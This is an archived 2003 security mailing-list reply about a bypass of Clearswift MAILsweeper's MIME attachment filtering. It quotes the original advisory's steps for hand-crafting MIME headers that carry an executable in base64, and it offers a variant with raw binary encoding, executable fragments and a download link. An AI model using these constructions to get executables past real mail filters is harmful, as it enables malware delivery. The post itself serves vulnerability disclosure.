[prev in list] [next in list] [prev in thread] [next in thread] 

List:       ntbugtraq
Subject:    Re: Corsaire Security Advisory - Clearswift MAILsweeper MIME attachme
From:       "http-equiv () excite ! com" <http-equiv () MALWARE ! COM>
Date:       2003-03-08 16:41:29
[Download RAW message or body]

<!--

Step 2: Now create a text file that will be used to hold the MIME
encoded attachment. Start notepad (or another text editor), and paste
in:


     MIME-Version: 1.0
     Content-Location:file:///executable.exe
     Content-Transfer-Encoding: base64


     TVp0AQIAAAAgAAgA//8YAIAAAAAQAAIAHgAAAAEAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 -->

That's a very interesting situation with content filters and anti-
virus filters. How many others are affected one must wonder.

Try the following as well, nothing more than pure binary:

http://www.malware.com/bin.exe.zip

MIME-Version: 1.0
Content-Location:File://foo.exe
Content-Transfer-Encoding: binary

MZD       ! ÿÿu     ™   >     û0jr                            y
ž



Lot more where that came from.

End Call

--
http://www.malware.com

oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Have you discovered a security vulnerability related to Windows or a
commercial product which runs on Windows?

Need assistance crafting the format or translating your advisory to English?

Need to verify it, or having problems contacting the Vendor?

Contact mailto:Advisories@NTBugtraq.com

oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
[prev in list] [next in list] [prev in thread] [next in thread]